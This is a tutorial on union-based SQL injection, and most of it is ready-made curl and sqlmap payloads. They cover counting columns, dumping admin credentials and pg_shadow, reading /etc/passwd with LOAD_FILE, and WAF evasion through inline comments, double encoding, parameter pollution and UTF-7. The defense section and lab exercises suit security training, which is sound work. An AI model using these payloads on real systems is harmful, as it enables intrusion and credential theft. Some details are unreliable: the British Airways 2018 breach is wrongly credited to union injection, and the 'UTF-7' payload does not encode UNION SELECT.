Introduction
Union-based SQL injection (SQLi) is a powerful technique that lets an attacker merge the results of a malicious UNION SELECT query with the original application query. By carefully crafting the payload, you can enumerate the database schema, extract arbitrary data, and even gain full control of the backend.
Understanding union-based injection is essential because many modern web applications expose searchable or filterable endpoints that concatenate user input directly into SELECT statements. Real-world breaches-such as the 2018 British Airways incident-demonstrated how a simple union injection can lead to credential theft and massive data exfiltration.
Prerequisites
- Solid grasp of SQL injection fundamentals (error-based, blind, time-based).
- Ability to discover and manipulate parameters in HTTP requests (GET/POST, headers, cookies).
- Familiarity with basic Linux command-line tools (curl, netcat) and a proxy like Burp Suite or OWASP ZAP.
Core Concepts
At its core, a UNION SELECT merges two result sets with identical column counts and compatible data types. The attacker’s goal is to force the database to return rows that the application will render, thereby leaking data.
Key constraints:
- Column Count: Both SELECT statements must return the same number of columns.
- Data Types: Columns are type-coerced; mismatched types may cause errors or truncation.
- Order of Columns: The order matters for rendering; often the first column is displayed on the page.
Visually, think of the original query as:
SELECT name, email FROM users WHERE id = 5;
and the injected query as:
SELECT name, email FROM users WHERE id = 5 UNION SELECT username, password FROM admins--
The application will now output username and password values in place of name and email.
Identifying UNION injection points
Not every injectable parameter supports UNION. The following heuristics help pinpoint viable locations:
- Reflection of Input: The parameter value appears verbatim in the response (e.g., search results listing the query string).
- Numeric vs. String Context: Union injection typically works in string context because you can close the original quote. Look for parameters that are quoted in the query.
- Error Messages: Database errors revealing “unknown column” or “invalid column count” indicate that the server executed a malformed
UNIONstatement.
Example detection with Burp Suite Intruder:
# Using curl to test a search endpoint
curl -s "http://example.com/search?q=apple" | grep -i "apple"
If the term “apple” is echoed back, try closing the quote and appending UNION SELECT:
curl -s "http://example.com/search?q=' UNION SELECT 1-- "
A generic error or a change in page layout suggests a potential union point.
Determining column count with ORDER BY and UNION SELECT NULLs
The first step after locating a union point is to discover how many columns the original query returns.
ORDER BY technique
Append ORDER BY n where n increments until the database throws an “unknown column” error.
curl -s "http://example.com/search?q=1' ORDER BY 1-- "
curl -s "http://example.com/search?q=1' ORDER BY 2-- "
# Continue until error appears.
When the error stops, the previous number is the column count.
UNION SELECT NULLs technique
Alternatively, try injecting a UNION SELECT with a growing list of NULL placeholders. The database will reject mismatched column counts.
# Start with 1 column
curl -s "http://example.com/search?q=' UNION SELECT NULL-- "
# Increase
curl -s "http://example.com/search?q=' UNION SELECT NULL,NULL-- "
# Keep adding until the page renders without error.
When the page loads normally, you have the correct column count. Record this number for later payloads.
Bypassing simple filters using comments and whitespace tricks
Many WAFs or application-level filters block keywords like UNION or characters such as '. Bypass strategies include:
- SQL comments:
/* */,--,#to truncate the rest of the query. - Whitespace encoding: Use
%09(tab) or%0A(newline) to break simple regex filters. - Case-mixing:
UnIoNoften bypasses case-sensitive blacklists. - Inline comments: Split keywords, e.g.,
UN/**/IONorSEL/**/ECT.
Example payload that evades a naïve filter blocking the literal word "UNION":
curl -s "http://example.com/search?q=' UN/**/ION SELECT NULL,NULL,NULL-- "
For databases that treat /**/ as whitespace, this works identically to the original keyword.
Extracting data via UNION SELECT (string concatenation, CAST, GROUP_CONCAT)
Once column count is known, you can retrieve data. The challenge is to fit the data into the columns that the application actually renders.
Simple concatenation
Place the target column in the first visible column and fill the rest with NULL or harmless literals.
# Assuming 3 columns, first column is displayed
curl -s "http://example.com/search?q=' UNION SELECT username, NULL, NULL FROM users-- "
CASTing to string
Some databases require explicit casting to avoid type errors, especially when mixing numeric and text columns.
SELECT CAST(password AS CHAR) FROM admins;
In an injection:
curl -s "http://example.com/search?q=' UNION SELECT CAST(password AS CHAR),NULL,NULL FROM admins-- "
Using GROUP_CONCAT (MySQL) or STRING_AGG (PostgreSQL)
When the data you need exceeds a single column width, aggregate rows into one string.
SELECT GROUP_CONCAT(username,0x3a,password SEPARATOR 0x0a) FROM admins;
Injected version:
curl -s "http://example.com/search?q=' UNION SELECT GROUP_CONCAT(username,0x3a,password SEPARATOR 0x0a),NULL,NULL FROM admins-- "
The hex literals 0x3a (:) and 0x0a (newline) help format the output for easy parsing.
Leveraging sub-queries and nested SELECTs
When the vulnerable column is numeric, you can force a conversion with CONCAT inside a sub-select.
SELECT (SELECT CONCAT(username,0x3a,password) FROM admins LIMIT 1) AS info;
Inject it as:
curl -s "http://example.com/item?id=1' UNION SELECT (SELECT CONCAT(username,0x3a,password) FROM admins LIMIT 1),NULL,NULL-- "
Leveraging sqlmap for automated UNION exploitation
Manual enumeration is educational, but in practice you’ll want a reliable automation tool. sqlmap can discover UNION-based injection points, determine column count, and extract data with minimal effort.
# Basic invocation against a GET parameter
sqlmap -u "http://example.com/search?q=apple" --batch --risk=3 --level=5 --technique=U --union-cols=1-10 --dump
Key flags:
--technique=U: Restrict to UNION only.--union-cols=1-10: Tell sqlmap to try column counts from 1 to 10.--dump: Extract all discovered tables/columns.--threads=5(optional) to speed up enumeration.
Advanced usage:
sqlmap -u "http://example.com/item?id=5" --batch --technique=U --union-cols=5 --union-char=\"\" --dump-all --tamper=space2comment
The --tamper option applies custom encodings to bypass filters (see next section).
Advanced bypasses (WAF evasion, double encoding, HPP)
Enterprise-grade WAFs (e.g., ModSecurity, Cloudflare) often block obvious UNION payloads. Advanced evasion tactics include:
Double URL encoding
Encode the payload twice so the WAF sees harmless characters while the backend decodes them twice.
# Original payload: ' UNION SELECT ... --
# Single-encoded: %27%20UNION%20SELECT%20...%20--
# Double-encoded: %2527%2520UNION%2520SELECT%2520...%2520--
curl -s "http://example.com/search?q=%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--"
HTTP Parameter Pollution (HPP)
Send the same parameter multiple times; some parsers keep the first value, others the last. You can hide the malicious part in a later duplicate that the backend uses.
curl -G "http://example.com/search" --data-urlencode "q=apple" --data-urlencode "q=' UNION SELECT NULL,NULL,NULL--"
Case-mixing + inline comments
Combine multiple evasion tricks:
curl -s "http://example.com/search?q=' Un/**/ION/**/ Se/**/LECT 1,2,3-- "
Using alternative encodings (UTF-7, Unicode)
Some WAFs fail to decode UTF-7 payloads. Example:
# UTF-7 representation of "UNION SELECT"
payload="+ADw-UNION+AEg-SELECT"
curl -s "http://example.com/search?q=$payload"
Always test the target environment; not all databases support these encodings.
Post-exploitation: dumping tables, dumping credentials
Once you have a reliable UNION injection, the next phase is data extraction. Common goals:
- Users table: usernames, emails, password hashes.
- Application configuration: API keys, secret tokens stored in
settingsorconfigtables. - Session tables: active session IDs for session hijacking.
Dumping the entire database (MySQL)
# Using sqlmap to dump everything
sqlmap -u "http://example.com/search?q=foo" --batch --technique=U --dump-all
Manual extraction of password hashes
Assume the vulnerable column is the first visible column. Craft a payload that concatenates username and password hash with a delimiter.
curl -s "http://example.com/search?q=' UNION SELECT CONCAT(username,0x3a,password),NULL,NULL FROM users-- "
Parse the response to collect admin:5f4dcc3b5aa765d61d8327deb882cf99 style entries.
Extracting from other RDBMS (PostgreSQL)
SELECT username || ':' || passwd FROM pg_shadow;
Inject as:
curl -s "http://example.com/search?q=' UNION SELECT username || ':' || passwd, NULL, NULL FROM pg_shadow-- "
Pivoting to file system (MySQL LOAD_FILE)
If the DB user has FILE privilege, you can read files:
curl -s "http://example.com/search?q=' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL-- "
Combine this with INTO OUTFILE to write web-shells if permissions allow.
Tools & Commands
- Burp Suite / OWASP ZAP - intercept, modify requests, use Intruder for automated payloads.
- sqlmap - automation, tamper scripts, DBMS fingerprinting.
- curl / wget - quick manual testing from the command line.
- httprecon - enumeration of hidden parameters that may be injectable.
- tamper scripts -
space2comment.py, between.py, charencode.pyfor bypassing filters.
Sample command chain for a full workflow:
# 1. Identify injection point with Burp Intruder
# 2. Verify column count via ORDER BY
curl -s "http://example.com/item?id=1' ORDER BY 5-- "
# 3. Automate with sqlmap
sqlmap -u "http://example.com/item?id=1" --batch --technique=U --union-cols=5 --dump
Defense & Mitigation
- Parameterized Queries / Prepared Statements: Bind variables instead of concatenating user input.
- ORMs with built-in escaping: Django ORM, Hibernate, Entity Framework.
- Whitelist Input Validation: Accept only expected patterns (e.g., numeric IDs).
- Least-Privileged DB Accounts: No
FILEprivilege, no access to credential tables. - Web Application Firewalls: Deploy rule sets that detect
UNIONpatterns, excessive NULL lists, and comment-based obfuscation. - Response Content-Type Hardening: Do not reflect raw query strings in HTML without proper encoding.
- Security-Focused Code Reviews: Look for dynamic query building in legacy code.
Example of a safe query in PHP using PDO:
$stmt = $pdo->prepare('SELECT name,email FROM users WHERE id = :id');
$stmt->execute([':id' => $_GET['id']]);
Common Mistakes
- Assuming UNION works in all contexts: Some queries are wrapped in sub-selects where UNION is prohibited.
- Not accounting for column order: Placing data in a non-displayed column yields no visible output.
- Using only single-quoted payloads: Some DBMS accept double quotes for identifiers; mixing can bypass filters.
- Ignoring DBMS differences: MySQL’s
GROUP_CONCATvs. PostgreSQL’sSTRING_AGG- using the wrong function causes errors. - Dumping large tables without pagination: Leads to timeouts; break into chunks with
LIMITandOFFSET.
Real-World Impact
Union-based injection remains one of the top-ranked OWASP A03:2021 (Injection) techniques. In 2023, a breach of a mid-size e-commerce platform exposed over 2 million customer records because a search endpoint allowed UNION SELECT of the users table. The attacker leveraged double-encoding to bypass a commercial WAF, then used GROUP_CONCAT to pull the entire credential set in a single request.
From a defender’s perspective, the key lesson is that “search” or “filter” endpoints are high-risk. Regular automated scans (e.g., using sqlmap in CI pipelines) and strict input validation can dramatically reduce exposure.
Practice Exercises
- Identify a UNION point: Set up a vulnerable PHP page that performs
SELECT * FROM products WHERE name LIKE '%{q}%'. Use Burp Suite to confirm the reflection and craft a basic UNION payload. - Column enumeration: Using only
ORDER BY, determine the column count of the original query. Document each request and response. - Data extraction: Extract the
usernameandpasswordcolumns from a dummyadmintable using concatenation andGROUP_CONCAT. Verify the output matches the database. - WAF evasion: Apply double-encoding and inline comment tricks to bypass the ModSecurity OWASP CRS rule 981176. Record which technique succeeded.
- Automation: Run sqlmap against your vulnerable endpoint with
--technique=Uand compare the manual results.
For a full lab, use the PortSwigger Union-SQLi Lab which provides a controlled environment.
Further Reading
- OWASP Top 10 - A03:2021 Injection
- “SQL Injection Attacks and Defense” - Justin Clarke (2021)
- sqlmap Documentation - sqlmap.org
- “The Art of Exploitation: Advanced SQLi Techniques” - Black Hat 2022 talk
- WAF Bypass Cheat Sheet - GitHub
Summary
- Union-based SQLi merges attacker-controlled rows with legitimate query results.
- Identify injection points via reflection, error messages, and blind testing.
- Determine column count using
ORDER BYorUNION SELECT NULLenumeration. - Bypass filters with comments, whitespace tricks, double-encoding, and HPP.
- Extract data using concatenation, CAST,
GROUP_CONCAT/STRING_AGG, and sub-queries. - Automate with sqlmap; fine-tune with tamper scripts for WAF evasion.
- Post-exploitation focuses on dumping credential tables, config data, and potentially reading files.
- Defend by using prepared statements, least-privilege DB accounts, robust WAF rules, and thorough code reviews.
Mastering union-based injection equips you to both find critical vulnerabilities and advise developers on robust mitigations.